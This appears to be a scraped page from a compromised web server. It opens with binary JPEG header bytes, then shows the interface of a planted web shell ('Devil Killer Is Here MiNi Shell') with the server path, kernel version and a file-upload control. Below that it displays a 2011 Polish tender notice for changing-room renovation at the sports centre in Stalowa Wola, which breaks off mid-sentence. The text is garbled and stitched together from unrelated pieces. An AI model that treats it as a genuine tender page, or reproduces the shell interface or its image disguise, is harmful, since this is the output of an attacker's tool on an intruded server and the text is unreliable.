JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110523/144965-N-2011.html

<p class="kh_header"><b>Stalowa Wola: Przebudowa szatni oznaczonych nr: 32, 33, 37, 38 mieszczących się w zespole obiektów: hala, basen Miejskiego Ośrodka Sportu i Rekreacji w Stalowej Woli przy ul. Hutnicza 15.</b><br>
<b>Numer ogłoszenia: 144965 - 2011; data zamieszczenia: 23.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , ul. Hutnicza 15, 37-450 Stalowa Wola, woj. podkarpackie, tel. 015 8422562, 8447338, faks 015 8422562, 8447338.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.mosir.stalowawola.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa szatni oznaczonych nr: 32, 33, 37, 38 mieszczących się w zespole obiektów: hala, basen Miejskiego Ośrodka Sportu i Rekreacji w Stalowej Woli przy ul. Hutnicza 15..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowa szatni oznaczonych nr: 32, 33, 37, 38 mieszczących się w zespole obiektów: hala, basen Miejskiego Ośrodka Sportu i Rekreacji w Stalowej Woli przy ul. Hutniczej 15, nr działki 26/41 obręb 6.
W zakres robót wchodzi m.in. przesunięcie oraz wyburzenia ścianek działowych ubikacji, natrysków wraz z wymianą instalacji sanitarnych, instalacji c.o., instalacji elektrycznej, stolarki drzwiowej, wykonanie instalacji wentylacyjnej mechanicznej wraz z zasilaniem.
Przybliżona charakterystyka robót:1) Szatnia nr: 32 i 33: A. Roboty wyburzeniowe i demontażowe. B. Roboty budowlane: - wykonanie ścian i zamurowań, - wykonanie okładzin ściennych i podłogowych, - montaż stolarki drzwiowej, - wykonanie tynków, - wykonanie powłok malarskich,	C. Roboty elektryczne:	- montaż instalacji oświetleniowej, - montaż instalacji gniazd wtyczkowych, - montaż zasilania instalacji siłowej i sterowania wentylacją, - montaż zabezpieczeń, - badania i pomiary. D. Roboty  instalacyjne: - montaż instalacji wody ciepłej i zimnej użytkowej,	- montaż kanalizacji sanitarnej, - przebudowa instalacji centralnego ogrzewania, - wykonanie instalacji wentylacyjnej nawiewno-wyciągowej, - przeprowadzenie prób. 2) Szatnia nr: 37 i 38: A. Roboty wyburzeniowe i demontażowe. B. Roboty budowlane:	- wykonanie ścian i zamurowań, - wykonanie nadproża, - wykonanie okładzin ściennych i podłogowych, - montaż stolarki drzwiowej, - wykonanie tynków,- wykonanie powłok malarskich, C. Roboty elektryczne:- montaż instalacji oświetleniowej,	- montaż instalacji gniazd wtyczkowych,- montaż zasilania instalacji siłowej i sterowania wentylacją,	- montaż zabezpieczeń, - badania i pomiary. D. Roboty  instalacyjne:- montaż instalacji wody ciepłej i zimnej użytkowej, - montaż kanalizacji sanitarnej, - przebudowa instalacji centralnego ogrzewania, - wykonanie instalacji wentylacyjnej nawiewno-wyciągowej, - przeprowadzenie prób. 3) Dokumentacja powykonawcza, tj. z naniesionymi zmianami w stosunku do dokumentacji pierwotnej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.11.00-9, 45.33.00.00-9, 45.33.11.00-7, 45.33.12.00-8, 45.31.00.00-3, 45.45.30.00-7, 45.26.25.00-6, 45.41.00.00-4, 45.43.00.00-4, 45.44.21.00-8, 45.42.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.08.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie jest wymagane.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony, jeżeli Wykonawca w ciągu ostatnich 5 lat przed wszczęciem postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonywał, co najmniej 3 zlecenia polegające na remoncie bądź przebudowie obiektu, budynku bądź jego części. Przy czym w zakresie wykonywanych prac przy każdym ww. zleceniu były pomieszczenia szatni i pomieszczenia sanitarne.
Minimalna wartość pojedynczego zlecenia nie może być mniejsza niż 350 000, 00 zł brutto.
Należy wypełnić Załącznik nr 7 do SIWZ i dodatkowo załączyć dokumenty potwierdzające prawidłowe wykonanie wymienionych robót.
Zamawiający oceni warunek na zasadzie: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie jest wymagane.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony, jeżeli Wykonawca udokumentuje, że dysponuje lub na czas realizacji zamówienia będzie dysponował kierownikiem budowy o specjalności konstrukcyjno-budowlanej, posiadającym uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie, wymagane przepisami ustawy z dnia 7 lipca 1994r. Prawo budowlane (Dz. U z 2006 r. Nr 156, poz. 1118 z późn. zm.) oraz zrzeszonym w Polskiej Izbie Inżynierów Budownictwa.


 Należy załączyć oświadczenie napisane przez osobę mającą pełnić rolę kierownika budowy świadczące 
o posiadaniu uprawnień do sprawowania samodzielnych funkcji technicznych w budownictwie, wymagane przepisami ustawy z dnia 7 lipca 1994r. Prawo budowlane, (Dz. U z 2006 r. Nr 156, poz. 1118 z późn. zm.) oraz przynależność do Polskiej Izby Inżynierów Budownictwa. Załączone oświadczenie winno być podpisane i opieczętowane jak pozostałe dokumenty załączone do oferty Wykonawcy w niniejszym postępowaniu.
Zamawiający zaakceptuje również kopie dokumentów potwierdzających posiadanie uprawnień j.w. oraz przynależność do Polskiej Izby Inżynierów Budownictwa. W takim przypadku dokumenty winny być opisane (ZA ZGODNOŚĆ Z ORYGINAŁEM) i podpisane oraz opieczętowane jak pozostałe załączniki do niniejszego postępowania.
Zamawiający oceni warunek na zasadzie: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie spełniony jeżeli Wykonawca udokumentuje posiadanie opłaconej polisy na kwotę nie mniejszą niż 200 000,00 zł, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej na ww. kwotę w zakresie prowadzonej działalności związanej z przedmiotem umowy oraz przedstawi pisemne zobowiązanie, że przedłuży polisę w podanej wysokości na okres realizacji zlecenia z podpisami i pieczęciami jakie wymagane są na dokumentach dołączanych do oferty Wykonawcy w niniejszym postępowaniu.
Należy załączyć opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia oraz Załącznik nr 5 do SIWZ.
Zamawiający oceni warunek na zasadzie: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Ofertę cenową, o której mowa w Rozdz. IV pkt 1.4 SIWZ.

W przypadku składania oferty wspólnej należy złożyć jeden dokument.

b) Pełnomocnictwo o którym mowa w Rozdz. III pkt 4.2 i 4.3 SIWZ (w przypadku Wykonawców składających ofertę wspólną).

Należy złożyć jeden dokument.

c) Oświadczenie Wykonawcy o przedłużeniu polisy - Załącznik nr 5 do SIWZ, o którym mowa w Rozdz. III pkt 2.1 lit f) SIWZ.

W przypadku składania oferty wspólnej w/w dokumenty składa każdy z Wykonawców składających ofertę wspólną. 

d) Oświadczenie Wykonawcy o zapoznaniu się z  SIWZ, załączoną dokumentacją projektową, specyfikacjami oraz przedmiarami - Załącznik nr 6 do SIWZ.

W przypadku składania oferty wspólnej należy złożyć jeden dokument.


e) Oświadczenie Wykonawcy o udzieleniu rękojmi - Załącznik nr 4 do SIWZ

W przypadku składania oferty wspólnej należy złożyć jeden dokument.


f) Podwykonawcy - Załącznik nr 8 do SIWZ

W przypadku składania oferty wspólnej należy złożyć jeden dokument.


g) Kosztorysy ofertowe z zachowaniem pozycji i kolejności jak w przedmiarach robót stanowiących załącznik do SIWZ, podaniem cen jednostkowych oraz z uwzględnieniem Rozdz. II pkt 4.4 SIWZ. 

W przypadku składania oferty wspólnej należy złożyć jeden dokument wg ww. zastrzeżenia.


h) Wzór umowy stanowiący Załącznik nr 9 do SIWZ - zaakceptowany zgodnie z wymaganiami SIWZ.

W przypadku składania oferty wspólnej należy złożyć jeden dokument.


i) dokumenty potwierdzające spełnienie wymagań wymienionych w Rozdz. III pkt 2.1 lit. e) niniejszej SIWZ, tj. oświadczenie napisane przez osobę mającą pełnić rolę kierownika budowy świadczące o posiadaniu uprawnień do sprawowania samodzielnych funkcji technicznych w budownictwie, wymagane przepisami ustawy z dnia 7 lipca 1994r. Prawo budowlane, (Dz. U z 2006 r. Nr 156, poz. 1118 z późn. zm.) oraz przynależność do Polskiej Izby Inżynierów Budownictwa.
Załączone oświadczenie winno być podpisane i opieczętowane jak pozostałe dokumenty załączone do oferty Wykonawcy w niniejszym postępowaniu.
Zamawiający zaakceptuje również kopie dokumentów potwierdzających posiadanie uprawnień j.w. oraz przynależność do Polskiej Izby Inżynierów Budownictwa. W takim przypadku dokumenty winny być opisane (ZA ZGODNOŚĆ Z ORYGINAŁEM) i podpisane oraz opieczętowane jak pozostałe załączniki do niniejszego postępowania.


UWAGA:
Wszystkie ww. dokumenty należy wypełnić i załączyć do oferty z wyjątkiem pełnomocnictwa (Rozdz. III pkt 3.8 lit b)), jeżeli nie dotyczy.
W przypadku braku podwykonawców (Rozdz. III pkt 3.8 lit f)) lub jeżeli termin obowiązywania polisy (Rozdz. III pkt 3.8 lit c)), nie jest krótszy niż termin wykonania przedmiotowego zlecenia, wówczas załączony dokument należy przekreślić, opisać (NIE DOTYCZY) i podpisać zgodnie z wymaganiami SIWZ jak pozostałe dokumenty.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 Ustawy Zamawiający przewiduje:

     A) wykonanie robót zamiennych, które muszą:
	1) uzyskać pisemną zgodę Zamawiającego,
	2) odpowiadać treści oferty i nie wykraczać poza określenie przedmiotu zamówienia,
	3) odbywać się w granicach przewidzianych w prawie budowlanym:
	   a) art. 23 pkt 1 - jeżeli są uzasadnione koniecznością zwiększenia bezpieczeństwa 
                       wykonania robót budowlanych lub usprawnienia procesu budowy,
	   b) art. 36a ust 5 - nie odstępują w sposób istotny od zatwierdzonego projektu lub 
                       warunków pozwolenia na budowę i dokonane zostały zgodnie z zapisami 
                       art. 36a ust.6.
      B) zmiany ilości robót budowlanych, dostaw lub usług w stosunku do przedmiaru, 
            pod warunkiem, że wynikają one z dokumentacji projektowej i zasad wiedzy technicznej,
      C) rezygnację z wykonania części robót budowlanych, dostaw lub usług, nieprzekraczających 
             jednak 20% wynagrodzenia Wykonawcy,
      D) zmiany jakości lub innych parametrów charakterystycznych dla objętego proponowaną 
             zmianą elementu robót budowlanych,
      E) możliwość aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny,
      F) zmiany producenta urządzeń lub wyposażenia,
      G) zmiany wymiarów, położenia lub wysokości części robót budowlanych,
       I) zmiany terminów wykonywania robót budowlanych.

  Jeżeli zmiana, o której mowa powyżej wymaga zmiany dokumentacji projektowej 
lub specyfikacji technicznych wykonania i odbioru robót budowlanych, strona inicjująca zmianę przedstawia projekt zamienny zawierający opis proponowanych zmian wraz z informacją 
o konieczności lub nie, zmiany pozwolenia na budowę oraz przedmiar i niezbędne rysunki.       
Projekt taki wymaga akceptacji nadzoru autorskiego i zatwierdzenia do realizacji 
przez Zamawiającego.
  Warunkiem dokonania zmian, o których mowa powyżej, jest złożenie wniosku 
przez stronę inicjującą zmianę zawierającego:

1) opis propozycji zmiany,
2) uzasadnienie zmiany,
3) obliczenie kosztów zmiany, przy czym wycenę ofertową należy przygotować zgodnie z  zasadami określonymi w Umowie, jeżeli zmiana będzie miała wpływ na wynagrodzenie Wykonawcy,
4) opis wpływu zmiany na termin wykonania Umowy.

  Zmiany, o których mowa powyżej mogą zostać dokonane, jeżeli zachodzą i są ich uzasadnieniem niżej wymienione okoliczności:

        a) obniżenie kosztu wykonania robót lub kosztu eksploatacji (użytkowania) obiektu,
        b) poprawy wartości lub podniesienia sprawności ukończonych robót budowlanych,
        c) zmiany obowiązujących przepisów,
        d) podniesienie wydajności urządzeń,
        e) podniesienie bezpieczeństwa wykonywania robót,
        f) usprawnienia w trakcie użytkowania obiektu,
        g) opóźnienia, utrudnienia, zawieszenia robót lub przeszkody spowodowane przez nie 
            dające się przypisać Zamawiającemu, personelowi Zmawiającego; lub innemu 
            Wykonawcy, zatrudnionemu przez Zamawiającego na terenie budowy,
        h) zaistnienie nieprzewidzianych w Umowie warunków geologicznych, 
            hydrogeologicznych, wykopalisk, wyjątkowo niekorzystnych warunków klimatycznych, 
            a także innych przeszkód lub skażeń uniemożliwiających kontynuowanie Umowy 
             na przewidzianych w niej warunkach,
         i) siła wyższa.

  Postawę obliczenia kosztów zmiany, w przypadku, gdy będą one wynikać ze zmian 
w dokumentacji projektowej lub specyfikacji technicznych wykonania i odbioru robót stanowi 
projekt zamienny, o którym mowa powyżej oraz:
- kosztorys Wykonawcy opracowany na podstawie cen jednostkowych podanych 
w kosztorysie ofertowym, o którym mowa w Rozdz.III pkt 3.8 lit. g) niniejszej SIWZ lub 
w przypadku braku odpowiedniej pozycji w wymienionym kosztorysie, innych danych wyjściowych przyjętych do sporządzenia kosztorysu Wykonawcy, przy czym zastrzega się, że ceny jednostkowe pracy sprzętu i materiałów zaproponowanych przez Wykonawcę, nie mogą być większe niż średnie ceny SEKOCENBUD dla kwartału poprzedzającego termin wykonania robót budowlanych, 
- kalkulacja uproszczona sporządzona w oparciu o publikator cen jednostkowych robót budowlanych - SECOCENBUD dla kwartału poprzedzającego termin wykonania robót budowlanych.
	
      Jeżeli z tytułu zmian w dokumentacji projektowej lub specyfikacjach technicznych 
konieczny będzie dodatkowy czas na wykonanie przedmiotu umowy Zamawiający przedłuży 
Wykonawcy termin wykonania.
          Wykonawca nie będzie jednakże uprawniony do żadnego przedłużania terminu 
wykonania Umowy i zwiększenia wynagrodzenia, jeżeli zmiana jest wymuszona uchybieniem 
czy naruszeniem Umowy przez Wykonawcę. W takim przypadku koszty dodatkowe związane    
z takimi zmianami ponosi Wykonawca.

       J) zmiany nieistotne postanowień zawartej umowy, zgodnie z treścią art. 144 ust. 1 Ustawy,
       K) zmiany obligatoryjne wynikające ze zmian przepisów prawa, niezależnych od stron,
       L) zmiany na skutek zdarzenia niezależnego od Zamawiającego, np.: decyzji organu 
            administracji, orzeczenia sądowego, bezpośrednio wpływającego na przedmiot 
            zamówienia, w zakresie objętym decyzją lub orzeczeniem sądu,
       M) zmiany danych teleadresowych, np.: siedziby firmy, adresu do korespondencji, numerów 
             telefonów (stacjonarnych i komórkowych) wynikających z bieżących umów i potrzeb,
       N) zmianę osób wskazanych w ofercie Wykonawcy, wyłącznie za zgodą Zamawiającego 
            wyrażoną w formie pisemnej, pod warunkiem posiadania przez te osoby, co najmniej 
            takich samych uprawnień i kwalifikacji zawodowych jak wymagane przez przepisy 
            prawa w tym zakresie (Wykonawca będzie zobowiązany dostarczyć Zamawiającemu 
            kopię uprawnień pracowników, w celu uzyskania zgody),
       O) zmianę podwykonawców wskazanych w ofercie Wykonawcy w załączniku nr 8 
             do SIWZ, wyłącznie za zgodą Zamawiającego o ile nie zmieni to warunków SIWZ,
       P) podzlecanie robót przez Wykonawcę Podwykonawcom w zakresie nieokreślonym 
            w ofercie Wykonawcy w załączniku nr 8 do SIWZ w trakcie realizacji przedmiotu 
            umowy będzie mogło nastąpić za pisemną zgodą Zamawiającego i o ile nie zmieni 
            to warunków SIWZ wyrażoną w formie pisemnej,
       Q) zmianę Inspektorów Nadzoru z uwagi na sytuacje losowe, np. choroba, urlop itp.
       R) zmianę przedmiotu umowy na skutek zdarzenia, którego następstwem jest utrata 
            przez Zamawiającego prawa do administrowania nieruchomością, na której świadczona 
            jest robota budowlana, w zakresie praw i obowiązków stron umowy,
       S) zmianę terminu wykonania zamówienia w przypadku wystąpienia robót dodatkowych 
            opóźniających lub wstrzymujących realizację robót zasadniczych, o okres odpowiadający 
            wstrzymaniu lub opóźnieniu wykonywania robót zasadniczych, jeżeli przy zachowaniu 
            należytej staranności z uwzględnieniem profesjonalnego charakteru Wykonawcy 
            nie można było uniknąć zmiany terminu wykonania umowy,
       T) w przypadku zmiany strukturalnych stron umowy, takich jak zmiana formy 
